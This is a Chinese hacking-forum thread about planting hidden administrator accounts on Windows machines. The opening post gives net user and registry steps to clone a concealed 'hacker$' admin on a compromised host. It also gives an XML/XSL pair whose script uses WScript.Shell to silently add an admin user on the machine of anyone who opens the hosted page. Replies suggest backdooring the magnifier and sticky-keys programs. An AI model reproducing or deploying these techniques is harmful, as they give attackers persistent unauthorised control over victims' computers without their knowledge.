添加超级管理帐户!
一.1.登录到肉鸡
2.regedt32
增加HKEY_LOCAL_MACHINE\SAM\ADM的权限
这个默认是没有权限的 所以要自己添加 看我操作
我的当前用户为 ycdm所以要给ycdm添加权限
3新建帐号如hacker$ ($表示在命令行下不显示此用户)
net user hacker$ 123789 /add
4regedit
打开注册表,将hacker$克隆成你的管理员
5导出hacker$所对应的那两个值
6将hacker$删掉
net user hacker$ /del
7导入注册表
ok完成
二.xml+xsl添加超级管理帐户!
用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.
这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
<?xml version="1.0" encoding="GB2312"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>
swords.xsl
<?xml version="1.0" encoding="gb2312"?>
<xsl:stylesheet xmlns:xsl="[url=http://www.w3.org/TR/WD-xsl][color=#00447b]http://www.w3.org/TR/WD-xsl[/color][/url]">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user swords est /add",0);
wsh.run( "net localgroup administrators swords /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet> 。。。第一条说得不清楚。。。
那应该是克隆账号的步骤吧 还有 这个貌似开关机下 账号就暴露了
现在最好的做法就是用放大镜捆个加用户的EXE
粘滞键捆删用户的EXE
用法应该不用我教了吧 而且超级安全的,哈哈
不用LZ说的那么烦 二.xml+xsl添加超级管理帐户!
你这是在给哪台机子添加管理员???
XSL是到客户端才转换的吧???? 第一那是克隆管理员没错,第二是给客户机添加超级管理员::08:: 思路不错(第二种)!!
::02:: ::02:: ::02:: ::02:: ::02:: ::04:: ::04:: ::04:: ::04:: ::04:: 我说添加怎么用那么麻烦呢
可龙哦 看来真是用到实处了,黑X上刚讲了XML这东西,哎,危害太大啊 顶呀 经典::16:: ::16:: 我说添加怎么用那么麻烦呢
可龙哦 安全性 怎么样啊
页:
[1]